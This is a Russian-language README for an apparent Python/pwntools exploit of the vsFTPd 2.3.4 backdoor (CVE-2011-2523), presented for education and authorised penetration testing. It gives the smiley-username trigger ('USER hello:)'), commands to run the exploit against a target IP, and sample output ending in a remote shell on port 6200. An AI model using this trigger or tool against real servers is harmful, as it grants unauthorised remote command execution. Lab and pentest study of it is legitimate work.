
Эксплойт на Python для бэкдора vsFTPd 2.3.4 (CVE-2011-2523), который запускает скрытую оболочку на порту 6200 через специально сформированное имя пользователя, обеспечивая удаленное выполнение команд для авторизованного пентестинга.
Этот проект демонстрирует эксплуатацию уязвимости бэкдора vsFTPd 2.3.4 (CVE-2011-2523) с использованием Python и pwntools.
Предупреждение: Этот проект предназначен только для образовательных целей и авторизованного тестирования на проникновение. НЕ используйте против систем без разрешения.
👉 Уязвимая версия vsFTPd содержит вредоносный бэкдор, который активируется, если при входе используется имя пользователя, содержащее :).
vsFTPd 2.3.4USER hello:))pwntoolsУстановка зависимостей:
pip install pwntools
python3 exploit.py <TARGET_IP>
python3 exploit.py <TARGET_IP> <PORT>
python3 exploit.py 192.168.190.140
[+] Checking FTP Version...
[+] Triggering backdoor...
[+] Connecting to backdoor....
[+] Got Shell
$
Цель должна работать под vsFTPd 2.3.4 (уязвимая версия)
Порт 6200 должен быть доступен
Лучше всего работает в лабораторных средах, таких как: